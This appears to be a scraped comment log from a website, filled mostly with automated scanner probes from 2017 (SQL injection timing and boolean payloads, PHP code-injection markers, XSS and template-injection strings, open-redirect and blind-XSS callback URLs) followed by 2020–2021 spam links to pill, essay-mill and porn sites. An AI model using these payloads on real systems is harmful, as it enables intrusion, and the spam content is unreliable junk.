(select(0)from(select(sleep(47)))v)/*'+(select(0)from(select(sleep(47)))v)+'"+(select(0)from(select(sleep(47)))v)+"*/

hvlcrvgk
7/6/2017 7:15:55 AM

${@print(md5(acunetix_wvs_security_test))}

sknkcrdc
7/6/2017 7:16:04 AM

1 waitfor delay '0:0:94' --

sknkcrdc
7/6/2017 7:16:10 AM

9S2ZhpID'; waitfor delay '0:0:94' --

hvlcrvgk
7/6/2017 7:16:12 AM

${@print(md5(acunetix_wvs_security_test))}\

sknkcrdc
7/6/2017 7:16:17 AM

8CxOWHfm'); waitfor delay '0:0:94' --

sknkcrdc
7/6/2017 7:16:20 AM

IfUrdMNF')); waitfor delay '0:0:94' --

sknkcrdc
7/6/2017 7:16:29 AM

vnyQmant';select pg_sleep(94); --

sknkcrdc
7/6/2017 7:16:34 AM

LXXFiFX9');select pg_sleep(94); --

sknkcrdc
7/6/2017 7:16:38 AM

oyX9g3mt'));select pg_sleep(141); --

hvlcrvgk
7/6/2017 7:18:16 AM

;print(md5(acunetix_wvs_security_test));

hvlcrvgk
7/6/2017 7:18:25 AM

';print(md5(acunetix_wvs_security_test));$a='

hvlcrvgk
7/6/2017 7:18:28 AM

";print(md5(acunetix_wvs_security_test));$a="

hvlcrvgk
7/6/2017 7:18:47 AM

${@print(md5(acunetix_wvs_security_test))}

hvlcrvgk
7/6/2017 7:18:49 AM

${@print(md5(acunetix_wvs_security_test))}\

hvlcrvgk
7/6/2017 7:21:01 AM

;print(md5(acunetix_wvs_security_test));

hvlcrvgk
7/6/2017 7:21:04 AM

';print(md5(acunetix_wvs_security_test));$a='

hvlcrvgk
7/6/2017 7:21:12 AM

";print(md5(acunetix_wvs_security_test));$a="

hvlcrvgk
7/6/2017 7:21:16 AM

${@print(md5(acunetix_wvs_security_test))}

hvlcrvgk
7/6/2017 7:21:24 AM

${@print(md5(acunetix_wvs_security_test))}\

hvlcrvgk
7/6/2017 7:22:39 AM

;print(md5(acunetix_wvs_security_test));

hvlcrvgk
7/6/2017 7:22:47 AM

';print(md5(acunetix_wvs_security_test));$a='

hvlcrvgk
7/6/2017 7:22:50 AM

";print(md5(acunetix_wvs_security_test));$a="

hvlcrvgk
7/6/2017 7:22:54 AM

${@print(md5(acunetix_wvs_security_test))}

hvlcrvgk
7/6/2017 7:22:56 AM

${@print(md5(acunetix_wvs_security_test))}\

sknkcrdc
7/6/2017 7:23:26 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

sknkcrdc
7/6/2017 7:23:29 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

sknkcrdc
7/6/2017 7:23:35 AM

-1 OR 2+834-834-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:23:39 AM

-1 OR 3+834-834-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:23:50 AM

-1 OR 3*2<(0+5+834-834) --

sknkcrdc
7/6/2017 7:23:58 AM

-1 OR 3*2>(0+5+834-834) --

sknkcrdc
7/6/2017 7:24:03 AM

-1 OR 2+668-668-1=0+0+0+1

sknkcrdc
7/6/2017 7:24:08 AM

-1 OR 3+668-668-1=0+0+0+1

sknkcrdc
7/6/2017 7:24:17 AM

-1 OR 3*2<(0+5+668-668)

sknkcrdc
7/6/2017 7:24:26 AM

-1 OR 3*2>(0+5+668-668)

sknkcrdc
7/6/2017 7:24:31 AM

-1' OR 2+944-944-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:24:35 AM

-1' OR 3+944-944-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:24:44 AM

-1' OR 3*2<(0+5+944-944) --

hvlcrvgk
7/6/2017 7:24:47 AM

;print(md5(acunetix_wvs_security_test));

sknkcrdc
7/6/2017 7:24:49 AM

-1' OR 3*2>(0+5+944-944) --

hvlcrvgk
7/6/2017 7:25:00 AM

';print(md5(acunetix_wvs_security_test));$a='

hvlcrvgk
7/6/2017 7:25:05 AM

";print(md5(acunetix_wvs_security_test));$a="

sknkcrdc
7/6/2017 7:25:08 AM

-1' OR 2+250-250-1=0+0+0+1 or 'BnFfRNiQ'='

sknkcrdc
7/6/2017 7:25:13 AM

-1' OR 3+250-250-1=0+0+0+1 or 'BnFfRNiQ'='

hvlcrvgk
7/6/2017 7:25:14 AM

${@print(md5(acunetix_wvs_security_test))}

sknkcrdc
7/6/2017 7:25:16 AM

-1' OR 3*2<(0+5+250-250) or 'BnFfRNiQ'='

hvlcrvgk
7/6/2017 7:25:23 AM

${@print(md5(acunetix_wvs_security_test))}\

sknkcrdc
7/6/2017 7:25:26 AM

-1' OR 3*2>(0+5+250-250) or 'BnFfRNiQ'='

sknkcrdc
7/6/2017 7:25:32 AM

-1" OR 2+702-702-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:25:43 AM

-1" OR 3+702-702-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:25:49 AM

-1" OR 3*2<(0+5+702-702) --

sknkcrdc
7/6/2017 7:25:57 AM

-1" OR 3*2>(0+5+702-702) --

sknkcrdc
7/6/2017 7:26:06 AM

if(now()=sysdate(),sleep(51),0)/*'XOR(if(now()=sysdate(),sleep(51),0))OR'"XOR(if(now()=sysdate(),sleep(51),0))OR"*/

sknkcrdc
7/6/2017 7:26:17 AM

(select(0)from(select(sleep(51)))v)/*'+(select(0)from(select(sleep(51)))v)+'"+(select(0)from(select(sleep(51)))v)+"*/

sknkcrdc
7/6/2017 7:26:20 AM

1 waitfor delay '0:0:51' --

sknkcrdc
7/6/2017 7:26:24 AM

48rrBU23'; waitfor delay '0:0:51' --

sknkcrdc
7/6/2017 7:26:36 AM

NA9w9XTA'); waitfor delay '0:0:51' --

sknkcrdc
7/6/2017 7:26:46 AM

Qp99U18s')); waitfor delay '0:0:102' --

sknkcrdc
7/6/2017 7:26:50 AM

xXacO5BE';select pg_sleep(102); --

sknkcrdc
7/6/2017 7:26:53 AM

aC8bsdSl');select pg_sleep(102); --

sknkcrdc
7/6/2017 7:26:56 AM

jXjRQYJn'));select pg_sleep(102); --

hvlcrvgk
7/6/2017 7:27:30 AM

;print(md5(acunetix_wvs_security_test));

hvlcrvgk
7/6/2017 7:27:34 AM

';print(md5(acunetix_wvs_security_test));$a='

hvlcrvgk
7/6/2017 7:27:38 AM

";print(md5(acunetix_wvs_security_test));$a="

hvlcrvgk
7/6/2017 7:28:01 AM

${@print(md5(acunetix_wvs_security_test))}

hvlcrvgk
7/6/2017 7:28:04 AM

${@print(md5(acunetix_wvs_security_test))}\

hvlcrvgk
7/6/2017 7:30:00 AM

;print(md5(acunetix_wvs_security_test));

hvlcrvgk
7/6/2017 7:30:02 AM

';print(md5(acunetix_wvs_security_test));$a='

hvlcrvgk
7/6/2017 7:30:06 AM

";print(md5(acunetix_wvs_security_test));$a="

hvlcrvgk
7/6/2017 7:30:20 AM

${@print(md5(acunetix_wvs_security_test))}

hvlcrvgk
7/6/2017 7:30:23 AM

${@print(md5(acunetix_wvs_security_test))}\

qnblgtak
7/6/2017 7:34:25 AM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

sknkcrdc
7/6/2017 7:34:34 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

sknkcrdc
7/6/2017 7:34:52 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

qnblgtak
7/6/2017 7:35:00 AM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

sknkcrdc
7/6/2017 7:35:10 AM

-1 OR 2+955-955-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:35:19 AM

-1 OR 3+955-955-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:35:34 AM

-1 OR 3*2<(0+5+955-955) --

sknkcrdc
7/6/2017 7:35:38 AM

-1 OR 3*2>(0+5+955-955) --

sknkcrdc
7/6/2017 7:35:42 AM

-1 OR 2+978-978-1=0+0+0+1

sknkcrdc
7/6/2017 7:35:47 AM

-1 OR 3+978-978-1=0+0+0+1

qnblgtak
7/6/2017 7:35:48 AM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

sknkcrdc
7/6/2017 7:35:55 AM

-1 OR 3*2<(0+5+978-978)

sknkcrdc
7/6/2017 7:35:59 AM

-1 OR 3*2>(0+5+978-978)

sknkcrdc
7/6/2017 7:36:03 AM

-1' OR 2+943-943-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:36:11 AM

-1' OR 3+943-943-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:36:15 AM

-1' OR 3*2<(0+5+943-943) --

sknkcrdc
7/6/2017 7:36:25 AM

-1' OR 3*2>(0+5+943-943) --

qnblgtak
7/6/2017 7:36:29 AM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

sknkcrdc
7/6/2017 7:36:37 AM

-1' OR 2+173-173-1=0+0+0+1 or 'oDJqYFyX'='

sknkcrdc
7/6/2017 7:36:41 AM

-1' OR 3+173-173-1=0+0+0+1 or 'oDJqYFyX'='

sknkcrdc
7/6/2017 7:36:45 AM

-1' OR 3*2<(0+5+173-173) or 'oDJqYFyX'='

sknkcrdc
7/6/2017 7:36:50 AM

-1' OR 3*2>(0+5+173-173) or 'oDJqYFyX'='

sknkcrdc
7/6/2017 7:36:58 AM

-1" OR 2+553-553-1=0+0+0+1 --

qnblgtak
7/6/2017 7:37:02 AM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

sknkcrdc
7/6/2017 7:37:05 AM

-1" OR 3+553-553-1=0+0+0+1 --

sknkcrdc
7/6/2017 7:37:10 AM

-1" OR 3*2<(0+5+553-553) --

sknkcrdc
7/6/2017 7:37:19 AM

-1" OR 3*2>(0+5+553-553) --

sknkcrdc
7/6/2017 7:37:23 AM

if(now()=sysdate(),sleep(165),0)/*'XOR(if(now()=sysdate(),sleep(165),0))OR'"XOR(if(now()=sysdate(),sleep(165),0))OR"*/

qnblgtak
7/6/2017 7:37:28 AM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

sknkcrdc
7/6/2017 7:37:33 AM

(select(0)from(select(sleep(165)))v)/*'+(select(0)from(select(sleep(165)))v)+'"+(select(0)from(select(sleep(165)))v)+"*/

sknkcrdc
7/6/2017 7:37:39 AM

1 waitfor delay '0:0:55' --

qnblgtak
7/6/2017 7:37:40 AM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

sknkcrdc
7/6/2017 7:37:57 AM

2o2VgTsh'; waitfor delay '0:0:55' --

qnblgtak
7/6/2017 7:38:01 AM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

sknkcrdc
7/6/2017 7:38:12 AM

vvI2wiok'); waitfor delay '0:0:55' --

sknkcrdc
7/6/2017 7:38:15 AM

D5svZnnw')); waitfor delay '0:0:55' --

sknkcrdc
7/6/2017 7:38:19 AM

iiD8BQ0M';select pg_sleep(55); --

sknkcrdc
7/6/2017 7:38:26 AM

HjKUP8PW');select pg_sleep(55); --

sknkcrdc
7/6/2017 7:38:30 AM

VmUL5mTi'));select pg_sleep(110); --

qnblgtak
7/6/2017 7:38:44 AM

http://testasp.vulnweb.com/t/xss.html?%00.jpg

cioxexug
7/6/2017 7:45:48 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

cioxexug
7/6/2017 7:45:51 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:45:57 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:46:00 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx/.

cioxexug
7/6/2017 7:48:01 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

cioxexug
7/6/2017 7:48:06 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:48:10 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:48:14 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx/.

cioxexug
7/6/2017 7:49:41 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

cioxexug
7/6/2017 7:49:44 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:49:51 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:49:56 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx/.

vxwkrngn
7/6/2017 7:50:03 AM

http://hitFlSHZmdBPu.bxss.me/

vxwkrngn
7/6/2017 7:50:43 AM

http://hit5pTZeuPV7f.bxss.me/

cioxexug
7/6/2017 7:51:13 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

vxwkrngn
7/6/2017 7:51:15 AM

http://hitoRGf1YYNPx.bxss.me/

cioxexug
7/6/2017 7:51:22 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:51:25 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:51:32 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx/.

vxwkrngn
7/6/2017 7:51:49 AM

http://hitLJDqIHoEfA.bxss.me/

vxwkrngn
7/6/2017 7:52:13 AM

http://hitSa8zeSZUeI.bxss.me/

vxwkrngn
7/6/2017 7:52:47 AM

http://hitG0QxasbxUJ.bxss.me/

cioxexug
7/6/2017 7:52:55 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

cioxexug
7/6/2017 7:53:01 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:53:04 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

vxwkrngn
7/6/2017 7:53:10 AM

http://hitcgb2APs7Pw.bxss.me/

cioxexug
7/6/2017 7:53:19 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx/.

vxwkrngn
7/6/2017 7:53:33 AM

http://hitpV6SgNvG0e.bxss.me/

vxwkrngn
7/6/2017 7:53:56 AM

http://hit1lKRMS97wE.bxss.me/

btcwmamb
7/6/2017 7:54:26 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

btcwmamb
7/6/2017 7:54:32 AM

1'"

btcwmamb
7/6/2017 7:54:38 AM

\

btcwmamb
7/6/2017 7:54:50 AM

1����

cioxexug
7/6/2017 7:54:58 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

btcwmamb
7/6/2017 7:55:01 AM

@@tUfXi

btcwmamb
7/6/2017 7:55:06 AM

JyI=

btcwmamb
7/6/2017 7:55:10 AM

�'�"

btcwmamb
7/6/2017 7:55:17 AM

�''�""

cioxexug
7/6/2017 7:55:21 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

btcwmamb
7/6/2017 7:55:22 AM

(select convert(int,CHAR(65)))

cioxexug
7/6/2017 7:55:25 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:55:29 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx/.

cioxexug
7/6/2017 7:56:51 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

cioxexug
7/6/2017 7:56:54 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:56:59 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:57:03 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx/.

cioxexug
7/6/2017 7:58:16 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

cioxexug
7/6/2017 7:58:33 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 7:58:39 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

btcwmamb
7/6/2017 7:58:47 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

cioxexug
7/6/2017 7:58:50 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx/.

btcwmamb
7/6/2017 7:58:57 AM

1'"

btcwmamb
7/6/2017 7:59:02 AM

\

btcwmamb
7/6/2017 7:59:15 AM

1����

btcwmamb
7/6/2017 7:59:19 AM

@@5DgcX

btcwmamb
7/6/2017 7:59:33 AM

JyI=

btcwmamb
7/6/2017 7:59:51 AM

�'�"

cioxexug
7/6/2017 8:00:00 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

btcwmamb
7/6/2017 8:00:03 AM

�''�""

cioxexug
7/6/2017 8:00:05 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

btcwmamb
7/6/2017 8:00:07 AM

(select convert(int,CHAR(65)))

cioxexug
7/6/2017 8:00:11 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx

cioxexug
7/6/2017 8:00:16 AM

quyet-dinh-ban-hanh-cchhc_n58336_g787.aspx/.

lytyjthb
7/6/2017 8:02:30 AM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

btcwmamb
7/6/2017 8:03:00 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

btcwmamb
7/6/2017 8:03:04 AM

1'"

lytyjthb
7/6/2017 8:03:08 AM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

btcwmamb
7/6/2017 8:03:09 AM

\

btcwmamb
7/6/2017 8:03:13 AM

1����

btcwmamb
7/6/2017 8:03:17 AM

@@TDu1U

btcwmamb
7/6/2017 8:03:20 AM

JyI=

btcwmamb
7/6/2017 8:03:28 AM

�'�"

btcwmamb
7/6/2017 8:03:37 AM

�''�""

btcwmamb
7/6/2017 8:03:41 AM

(select convert(int,CHAR(65)))

lytyjthb
7/6/2017 8:03:55 AM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

lytyjthb
7/6/2017 8:04:13 AM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

lytyjthb
7/6/2017 8:04:49 AM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

lytyjthb
7/6/2017 8:05:05 AM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

lytyjthb
7/6/2017 8:05:32 AM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

lytyjthb
7/6/2017 8:05:54 AM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

lytyjthb
7/6/2017 8:06:07 AM

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

btcwmamb
7/6/2017 8:06:20 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

btcwmamb
7/6/2017 8:06:27 AM

1'"

btcwmamb
7/6/2017 8:06:31 AM

\

btcwmamb
7/6/2017 8:06:36 AM

1����

btcwmamb
7/6/2017 8:06:40 AM

@@SwBTH

btcwmamb
7/6/2017 8:06:50 AM

JyI=

btcwmamb
7/6/2017 8:06:53 AM

�'�"

btcwmamb
7/6/2017 8:07:02 AM

�''�""

btcwmamb
7/6/2017 8:07:05 AM

(select convert(int,CHAR(65)))

joansmlt
7/6/2017 8:07:10 AM

/www.vulnweb.com

joansmlt
7/6/2017 8:07:13 AM

919814

joansmlt
7/6/2017 8:07:18 AM

http://www.vulnweb.com

joansmlt
7/6/2017 8:07:22 AM

//www.vulnweb.com

joansmlt
7/6/2017 8:07:26 AM

/\www.vulnweb.com

joansmlt
7/6/2017 8:08:17 AM

/www.vulnweb.com

joansmlt
7/6/2017 8:08:21 AM

995355

joansmlt
7/6/2017 8:08:29 AM

http://www.vulnweb.com

joansmlt
7/6/2017 8:08:33 AM

//www.vulnweb.com

joansmlt
7/6/2017 8:08:47 AM

/\www.vulnweb.com

cigqotqs
7/6/2017 8:09:21 AM

'"

joansmlt
7/6/2017 8:09:43 AM

/www.vulnweb.com

joansmlt
7/6/2017 8:09:47 AM

940042

joansmlt
7/6/2017 8:09:51 AM

http://www.vulnweb.com

joansmlt
7/6/2017 8:10:01 AM

//www.vulnweb.com

joansmlt
7/6/2017 8:10:06 AM

/\www.vulnweb.com

cigqotqs
7/6/2017 8:10:22 AM

'"

btcwmamb
7/6/2017 8:10:57 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

cigqotqs
7/6/2017 8:11:08 AM

'"

btcwmamb
7/6/2017 8:11:10 AM

1'"

btcwmamb
7/6/2017 8:11:14 AM

\

joansmlt
7/6/2017 8:11:26 AM

/www.vulnweb.com

btcwmamb
7/6/2017 8:11:28 AM

1����

joansmlt
7/6/2017 8:11:30 AM

952658

btcwmamb
7/6/2017 8:11:33 AM

@@YYSdW

joansmlt
7/6/2017 8:11:36 AM

http://www.vulnweb.com

btcwmamb
7/6/2017 8:11:39 AM

JyI=

joansmlt
7/6/2017 8:11:40 AM

//www.vulnweb.com

btcwmamb
7/6/2017 8:11:43 AM

�'�"

joansmlt
7/6/2017 8:11:44 AM

/\www.vulnweb.com

btcwmamb
7/6/2017 8:11:47 AM

�''�""

btcwmamb
7/6/2017 8:11:51 AM

(select convert(int,CHAR(65)))

cigqotqs
7/6/2017 8:12:00 AM

'"

cigqotqs
7/6/2017 8:12:41 AM

'"

joansmlt
7/6/2017 8:13:01 AM

/www.vulnweb.com

joansmlt
7/6/2017 8:13:06 AM

909072

cigqotqs
7/6/2017 8:13:14 AM

'"

joansmlt
7/6/2017 8:13:15 AM

http://www.vulnweb.com

joansmlt
7/6/2017 8:13:19 AM

//www.vulnweb.com

joansmlt
7/6/2017 8:13:24 AM

/\www.vulnweb.com

cigqotqs
7/6/2017 8:14:09 AM

'"

btcwmamb
7/6/2017 8:14:09 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

btcwmamb
7/6/2017 8:14:14 AM

1'"

joansmlt
7/6/2017 8:14:18 AM

/www.vulnweb.com

joansmlt
7/6/2017 8:14:26 AM

933120

btcwmamb
7/6/2017 8:14:28 AM

\

joansmlt
7/6/2017 8:14:29 AM

http://www.vulnweb.com

btcwmamb
7/6/2017 8:14:32 AM

1����

joansmlt
7/6/2017 8:14:33 AM

//www.vulnweb.com

btcwmamb
7/6/2017 8:14:36 AM

@@RbGsT

cigqotqs
7/6/2017 8:14:40 AM

'"

btcwmamb
7/6/2017 8:14:44 AM

JyI=

joansmlt
7/6/2017 8:14:45 AM

/\www.vulnweb.com

btcwmamb
7/6/2017 8:14:49 AM

�'�"

btcwmamb
7/6/2017 8:14:54 AM

�''�""

btcwmamb
7/6/2017 8:14:59 AM

(select convert(int,CHAR(65)))

cigqotqs
7/6/2017 8:15:27 AM

'"

joansmlt
7/6/2017 8:15:47 AM

/www.vulnweb.com

joansmlt
7/6/2017 8:15:52 AM

980828

joansmlt
7/6/2017 8:15:57 AM

http://www.vulnweb.com

joansmlt
7/6/2017 8:16:02 AM

//www.vulnweb.com

joansmlt
7/6/2017 8:16:15 AM

/\www.vulnweb.com

joansmlt
7/6/2017 8:17:13 AM

/www.vulnweb.com

joansmlt
7/6/2017 8:17:24 AM

942172

btcwmamb
7/6/2017 8:17:28 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

joansmlt
7/6/2017 8:17:32 AM

http://www.vulnweb.com

joansmlt
7/6/2017 8:17:41 AM

//www.vulnweb.com

btcwmamb
7/6/2017 8:17:45 AM

1'"

joansmlt
7/6/2017 8:17:48 AM

/\www.vulnweb.com

btcwmamb
7/6/2017 8:17:50 AM

\

btcwmamb
7/6/2017 8:18:07 AM

1����

btcwmamb
7/6/2017 8:18:19 AM

@@HpeHf

btcwmamb
7/6/2017 8:18:24 AM

JyI=

btcwmamb
7/6/2017 8:18:34 AM

�'�"

btcwmamb
7/6/2017 8:18:38 AM

�''�""

btcwmamb
7/6/2017 8:18:42 AM

(select convert(int,CHAR(65)))

joansmlt
7/6/2017 8:19:16 AM

/www.vulnweb.com

joansmlt
7/6/2017 8:19:20 AM

937810

joansmlt
7/6/2017 8:19:23 AM

http://www.vulnweb.com

joansmlt
7/6/2017 8:19:27 AM

//www.vulnweb.com

joansmlt
7/6/2017 8:19:33 AM

/\www.vulnweb.com

fxaqdbfb
7/6/2017 8:21:18 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n_9149

fxaqdbfb
7/6/2017 8:21:30 AM

acu1684<s1﹥s2ʺs3ʹuca1684

fxaqdbfb
7/6/2017 8:21:39 AM

acux3143��z1��z2a�bcxuca3143

fxaqdbfb
7/6/2017 8:21:47 AM

CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g� ]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0

btcwmamb
7/6/2017 8:21:55 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

fxaqdbfb
7/6/2017 8:22:02 AM

{{9999076*9999951}}

btcwmamb
7/6/2017 8:22:06 AM

1'"

btcwmamb
7/6/2017 8:22:11 AM

\

btcwmamb
7/6/2017 8:22:15 AM

1����

btcwmamb
7/6/2017 8:22:20 AM

@@tAEBm

btcwmamb
7/6/2017 8:22:25 AM

JyI=

btcwmamb
7/6/2017 8:22:29 AM

�'�"

btcwmamb
7/6/2017 8:22:34 AM

�''�""

btcwmamb
7/6/2017 8:22:37 AM

(select convert(int,CHAR(65)))

fxaqdbfb
7/6/2017 8:23:23 AM

%25%32%36%25%32%33%32%32%31%3B%25%32%30%6B%69%25%65%31%25%62%61%25%62%66%6E%25%32%30%63%25%65%31%25%62%62%25%61%37%61%25%32%30%62%25%65%31%25%62%61%25%61%31%6E%3C%53%63%52%69%50%74%20%3E%6A%74%6D%50%289806%29%3C%2F%73%43%72%69%70%54%3E

fxaqdbfb
7/6/2017 8:23:29 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n<ScRiPt>jtmP(9425)</sCripT>

fxaqdbfb
7/6/2017 8:23:38 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n<%div style=width:expression(jtmP(9427))>

btcwmamb
7/6/2017 8:24:56 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

btcwmamb
7/6/2017 8:25:01 AM

1'"

btcwmamb
7/6/2017 8:25:12 AM

\

btcwmamb
7/6/2017 8:25:17 AM

1����

btcwmamb
7/6/2017 8:25:25 AM

@@DnffB

btcwmamb
7/6/2017 8:25:33 AM

JyI=

btcwmamb
7/6/2017 8:25:39 AM

�'�"

btcwmamb
7/6/2017 8:25:43 AM

�''�""

btcwmamb
7/6/2017 8:25:52 AM

(select convert(int,CHAR(65)))

Inae3
10/8/2020 9:20:30 PM

ktO0NB http://pills2sale.com/ cheap viagra

gL7xH4
10/18/2020 8:31:25 PM

Kult0T http://pills2sale.com/ levitra nizagara

8b36ze
12/4/2020 7:53:31 AM

iSlYIw https://www.quora.com/What-the-top-SEO-keywords-for-essay-you-know/answer/Alan-Smith-1772 write my essay

cejJfh
12/12/2020 7:42:34 AM

6z6j6M http://pills2sale.com/fTr1bYnau88IsQx

nlr1Ac
12/13/2020 6:28:40 AM

7EOWZZ http://xnxx.in.net/ xnxx videos

ZYVSum
12/13/2020 11:35:21 AM

DHutZR https://writemyessayforme.web.fc2.com/

ReuTz4
12/15/2020 12:34:44 PM

HvtZfF https://writemyessayforme.web.fc2.com/#writemyessay

sDF4d
12/23/2020 8:05:30 AM

I can't get a dialling tone

ep82Z2
12/23/2020 8:06:26 AM

I've got a part-time job

KCxoVx
1/9/2021 7:11:25 PM

8uAQqd https://writemyessayforme.web.fc2.com/octavio-paz-essay-day-of-the-dead.html

Scsz4
1/9/2021 11:31:59 PM

lpv5lu http://waldorfdollshop.us/ waldorf doll

SgADWL
6/29/2021 10:13:14 AM

VPmbRR https://xnxxx.web.fc2.com/ xnxx

ngyV6
7/23/2021 4:19:16 AM

write my essays writemyessayforme.web.fc2.com

4Q2UAh
8/3/2021 8:21:18 PM

https://beeg.x.fc2.com/sitemap1.html https://beeg.x.fc2.com/sitemap2.html https://xnxxx.web.fc2.com/sitemap1.html https://xnxxx.web.fc2.com/sitemap2.html https://xvideoss.web.fc2.com/sitemap1.html https://xvideoss.web.fc2.com/sitemap2.html

ks3jud
8/3/2021 8:28:46 PM

https://xvideoss.web.fc2.com/

TdmXw
11/16/2021 8:28:09 PM

I'll text you later http://yoonhada.com/?p=1341 stromectol ivermectin The diplomatic row has unluckily coincided with Monday'sscheduled arrival in Gibraltar of British warships on their wayto practice manoeuvres in the Mediterranean, leadingright-leaning Spanish media to accuse Britain of militarybullying.

mWB8k
11/16/2021 8:28:32 PM

Do you know the address? http://www.sdmbroadcast.com/news/view.asp?idx=367&msection=5&ssection=0 stromectol ivermectin The charity has awarded Coventry City Council a symbol to show it is committed to making changes by including people with dementia in local life and highlighting the importance of accessible transport and businesses that are respectful and responsive.

zIFyk2
11/16/2021 8:28:51 PM

